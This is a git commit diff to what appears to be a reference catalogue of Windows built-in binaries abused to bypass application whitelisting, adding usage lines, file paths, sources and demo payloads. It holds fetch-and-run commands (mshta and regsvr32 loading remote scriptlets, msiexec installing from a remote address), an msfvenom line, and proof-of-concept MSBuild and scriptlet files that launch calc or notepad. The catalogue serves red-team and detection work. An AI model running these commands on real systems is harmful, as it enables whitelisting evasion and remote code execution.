Added some more adjustments
parent
ddc1173e45
commit
1a0eb4edc7
|
@ -4,10 +4,37 @@
|
||||||
|
|
||||||
```
|
```
|
||||||
msbuild.exe pshell.xml
|
msbuild.exe pshell.xml
|
||||||
|
|
||||||
|
msbuild.exe Msbuild.csproj
|
||||||
```
|
```
|
||||||
|
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
* Casey Smith - @subtee
|
* Casey Smith - @subtee
|
||||||
|
* Cn33liz - @Cneelis
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
* [Msbuild.csproj](Payload/Msbuild.csproj)
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md
|
||||||
|
* https://github.com/Cn33liz/MSBuildShell
|
||||||
|
* https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
|
||||||
|
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
|
||||||
|
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
|
||||||
|
C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
|
||||||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
Example code borrowed from Red Canary - Atomic Red Team.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -9,7 +9,19 @@ Open .diagcab package
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
* ?
|
* ?
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
* [NameOfLink](Payload/NameOfPayload)
|
||||||
|
|
||||||
Resources:
|
Resources:
|
||||||
* https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
|
* https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
|
||||||
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||||
|
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
C:\Windows\System32\Msdt.exe
|
||||||
|
C:\Windows\SysWOW64\Msdt.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
|
||||||
|
|
|
@ -4,7 +4,30 @@
|
||||||
|
|
||||||
```
|
```
|
||||||
mshta.exe evilfile.hta
|
mshta.exe evilfile.hta
|
||||||
|
|
||||||
|
mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
|
||||||
|
|
||||||
|
mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
|
||||||
```
|
```
|
||||||
|
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
* ?
|
* Casey Smith - @subtee
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
* [Mshta_calc.sct](Payload/Mshta_calc.sct)
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Mshta.md
|
||||||
|
* https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
|
||||||
|
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
|
||||||
|
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
C:\Windows\System32\mshta.exe
|
||||||
|
C:\Windows\SysWOW64\mshta.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
SCT code borrowed from Red Canary - Atomic Red Team
|
||||||
|
|
||||||
|
|
|
@ -8,4 +8,25 @@ msiexec /q /i http://192.168.100.3/tmp/cmd.png
|
||||||
```
|
```
|
||||||
|
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
* Casey Smith - @subtee
|
* ? - @netbiosX
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
*
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
c:\windows\system32\msiexec.exe
|
||||||
|
c:\windows\sysWOW64\msiexec.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
Generate MSI file:
|
||||||
|
```
|
||||||
|
msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -9,3 +9,21 @@ odbcconf -f file.rsp
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
* Casey Smith - @subtee
|
* Casey Smith - @subtee
|
||||||
* Nick Tyrer - @NickTyrer
|
* Nick Tyrer - @NickTyrer
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
*
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
|
||||||
|
* https://github.com/woanware/application-restriction-bypasses
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
c:\windows\system32\odbcconf.exe
|
||||||
|
c:\windows\sysWOW64\odbcconf.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
Samples can be found in the resources.
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,47 @@
|
||||||
|
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
|
<!-- This inline task executes c# code. -->
|
||||||
|
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildBypass.csproj -->
|
||||||
|
<!-- Feel free to use a more aggressive class for testing. -->
|
||||||
|
<Target Name="Hello">
|
||||||
|
<FragmentExample />
|
||||||
|
<ClassExample />
|
||||||
|
</Target>
|
||||||
|
<UsingTask
|
||||||
|
TaskName="FragmentExample"
|
||||||
|
TaskFactory="CodeTaskFactory"
|
||||||
|
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
|
||||||
|
<ParameterGroup/>
|
||||||
|
<Task>
|
||||||
|
<Using Namespace="System" />
|
||||||
|
<Code Type="Fragment" Language="cs">
|
||||||
|
<![CDATA[
|
||||||
|
Console.WriteLine("Hello From a Code Fragment");
|
||||||
|
]]>
|
||||||
|
</Code>
|
||||||
|
</Task>
|
||||||
|
</UsingTask>
|
||||||
|
<UsingTask
|
||||||
|
TaskName="ClassExample"
|
||||||
|
TaskFactory="CodeTaskFactory"
|
||||||
|
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
|
||||||
|
<Task>
|
||||||
|
<!-- <Reference Include="System.IO" /> Example Include -->
|
||||||
|
<Code Type="Class" Language="cs">
|
||||||
|
<![CDATA[
|
||||||
|
using System;
|
||||||
|
using Microsoft.Build.Framework;
|
||||||
|
using Microsoft.Build.Utilities;
|
||||||
|
|
||||||
|
public class ClassExample : Task, ITask
|
||||||
|
{
|
||||||
|
public override bool Execute()
|
||||||
|
{
|
||||||
|
Console.WriteLine("Hello From a Class.");
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
]]>
|
||||||
|
</Code>
|
||||||
|
</Task>
|
||||||
|
</UsingTask>
|
||||||
|
</Project>
|
|
@ -0,0 +1,43 @@
|
||||||
|
<?XML version="1.0"?>
|
||||||
|
<scriptlet>
|
||||||
|
|
||||||
|
<registration
|
||||||
|
description="Bandit"
|
||||||
|
progid="Bandit"
|
||||||
|
version="1.00"
|
||||||
|
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
|
||||||
|
>
|
||||||
|
|
||||||
|
<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
|
||||||
|
<!-- DFIR -->
|
||||||
|
<!-- .sct files are downloaded and executed from a path like this -->
|
||||||
|
<!-- Though, the name and extension are arbitary.. -->
|
||||||
|
<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
|
||||||
|
<!-- Based on current research, no registry keys are written, since call "uninstall" -->
|
||||||
|
|
||||||
|
|
||||||
|
<!-- Proof Of Concept - Casey Smith @subTee -->
|
||||||
|
<script language="JScript">
|
||||||
|
<![CDATA[
|
||||||
|
|
||||||
|
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||||
|
|
||||||
|
]]>
|
||||||
|
</script>
|
||||||
|
</registration>
|
||||||
|
|
||||||
|
<public>
|
||||||
|
<method name="Exec"></method>
|
||||||
|
</public>
|
||||||
|
<script language="JScript">
|
||||||
|
<![CDATA[
|
||||||
|
|
||||||
|
function Exec()
|
||||||
|
{
|
||||||
|
var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
|
||||||
|
}
|
||||||
|
|
||||||
|
]]>
|
||||||
|
</script>
|
||||||
|
|
||||||
|
</scriptlet>
|
|
@ -8,3 +8,24 @@ Presentationhost.exe C:\temp\Evil.xbap
|
||||||
|
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
* Casey Smith - @subtee
|
* Casey Smith - @subtee
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
*
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
|
||||||
|
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
c:\windows\system32\PresentationHost.exe
|
||||||
|
c:\windows\sysWOW64\PresentationHost.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -3,10 +3,31 @@
|
||||||
* Functions: Execute
|
* Functions: Execute
|
||||||
|
|
||||||
```
|
```
|
||||||
regasm.exe /U regsvcs.dll
|
regasm.exe /U AllTheThings.dll
|
||||||
|
|
||||||
regasm.exe regsvcs.dll
|
|
||||||
```
|
```
|
||||||
|
|
||||||
Acknowledgements:
|
Acknowledgements:
|
||||||
* Casey Smith - @subtee
|
* Casey Smith - @subtee
|
||||||
|
|
||||||
|
Code sample:
|
||||||
|
* [AllTheThingsx64.dll](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/AllTheThings/AllTheThingsx64.dll)[1]
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
|
||||||
|
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/RegSvcsRegAsmBypass.cs
|
||||||
|
* https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/RegsvcsRegasm.md
|
||||||
|
* https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
|
||||||
|
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
|
||||||
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
|
||||||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
[1]Code sample linked to Red Canary - Atomic Red Team
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue